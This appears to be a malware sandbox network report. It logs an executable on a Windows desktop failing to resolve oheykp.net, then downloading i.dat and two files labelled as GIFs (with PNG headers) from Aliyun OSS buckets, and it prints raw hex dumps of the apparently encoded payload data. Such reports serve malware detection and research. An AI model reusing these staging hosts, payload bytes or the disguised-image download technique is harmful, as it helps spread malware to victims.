                                                  Jan 6, 2025 04:52:44.410594940 CET1.1.1.1192.168.2.60x93a8Name error (3)oheykp.netnonenoneA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:52:50.451785088 CET1.1.1.1192.168.2.60x2bc5Name error (3)oheykp.netnonenoneA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:52:56.482466936 CET1.1.1.1192.168.2.60x490fName error (3)oheykp.netnonenoneA (IP address)IN (0x0001)false
                                                  • hu5wd1.oss-cn-beijing.aliyuncs.com
                                                  • 22mm.oss-cn-hangzhou.aliyuncs.com
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.64992139.103.20.264433916C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-06 03:50:37 UTC111OUTGET /i.dat HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: hu5wd1.oss-cn-beijing.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-06 03:50:37 UTC559INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Mon, 06 Jan 2025 03:50:37 GMT
                                                  Content-Type: application/octet-stream
                                                  Content-Length: 512
                                                  Connection: close
                                                  x-oss-request-id: 677B530D8797BE3230589E9E
                                                  Accept-Ranges: bytes
                                                  ETag: "3F830864D62708390D84A4629D88083D"
                                                  Last-Modified: Sun, 05 Jan 2025 09:01:14 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 17523956267580149674
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000113
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: P4MIZNYnCDkNhKRinYgIPQ==
                                                  x-oss-server-time: 16
                                                  2025-01-06 03:50:37 UTC512INData Raw: 07 1b 1b 1f 6c 25 30 30 58 45 05 47 23 76 69 28 5b 5b 05 4b 25 66 29 2e 47 44 47 40 27 6e 21 2c 45 55 59 42 21 31 6c 21 4e 4c 0e 40 6e 27 29 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 4e 52 52 56 25 6c 79 79 11 0c 4c 0e 6a 3f 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 5b 46 06 44 20 75 6a 2b 58 58 06 48 26 65 2a 2d 44 47 44 43 24 6d 22 2f 46 56 5a 41 22 32 6f 22 4d 4f 0d 41 6f 26 28 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 4f 53 53 57 24 6d 78 78 10 0d 4d 0f 6b 3e 21
                                                  Data Ascii: l%00XEG#vi([[K%f).GDG@'n!,EUYB!1l!NL@n')&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyLj? aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33[FD uj+XXH&e*-DGDC$m"/FVZA"2o"MOAo&('''''''''''''''''''''''''''''''''OSSW$mxxMk>!


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.64993139.103.20.264433916C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-06 03:50:38 UTC111OUTGET /a.gif HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: hu5wd1.oss-cn-beijing.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-06 03:50:39 UTC546INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Mon, 06 Jan 2025 03:50:39 GMT
                                                  Content-Type: image/gif
                                                  Content-Length: 135589
                                                  Connection: close
                                                  x-oss-request-id: 677B530E478AB33331F4359C
                                                  Accept-Ranges: bytes
                                                  ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                                                  Last-Modified: Sun, 05 Jan 2025 09:00:15 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 8642451798640735006
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000104
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                                                  x-oss-server-time: 31
                                                  2025-01-06 03:50:39 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                  Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                  2025-01-06 03:50:39 UTC4096INData Raw: 92 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c
                                                  Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
                                                  2025-01-06 03:50:39 UTC4096INData Raw: 6c 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90
                                                  Data Ascii: lIl]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
                                                  2025-01-06 03:50:39 UTC4096INData Raw: 75 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91
                                                  Data Ascii: uc}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
                                                  2025-01-06 03:50:39 UTC4096INData Raw: b7 ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1
                                                  Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`
                                                  2025-01-06 03:50:39 UTC4096INData Raw: b7 d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1
                                                  Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
                                                  2025-01-06 03:50:39 UTC4096INData Raw: ce d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7
                                                  Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
                                                  2025-01-06 03:50:39 UTC4096INData Raw: db 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a
                                                  Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_
                                                  2025-01-06 03:50:39 UTC4096INData Raw: 56 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2
                                                  Data Ascii: VZ~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJL
                                                  2025-01-06 03:50:39 UTC4096INData Raw: 65 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd
                                                  Data Ascii: eWUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.64994239.103.20.264433916C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-06 03:50:40 UTC111OUTGET /b.gif HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: hu5wd1.oss-cn-beijing.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-06 03:50:41 UTC547INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Mon, 06 Jan 2025 03:50:40 GMT
                                                  Content-Type: image/gif
                                                  Content-Length: 125333
                                                  Connection: close
                                                  x-oss-request-id: 677B5310E48B2B3936FB0A1A
                                                  Accept-Ranges: bytes
                                                  ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                                  Last-Modified: Sun, 05 Jan 2025 09:00:15 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 10333201072197591521
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000104
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                                  x-oss-server-time: 28
                                                  2025-01-06 03:50:41 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                  Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                  2025-01-06 03:50:41 UTC4096INData Raw: 5e 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19
                                                  Data Ascii: ^_X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
                                                  2025-01-06 03:50:41 UTC4096INData Raw: 6d 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0
                                                  Data Ascii: mmkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
                                                  2025-01-06 03:50:41 UTC4096INData Raw: c2 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9
                                                  Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                                                  2025-01-06 03:50:41 UTC4096INData Raw: 19 d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7
                                                  Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
                                                  2025-01-06 03:50:41 UTC4096INData Raw: de 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4
                                                  Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
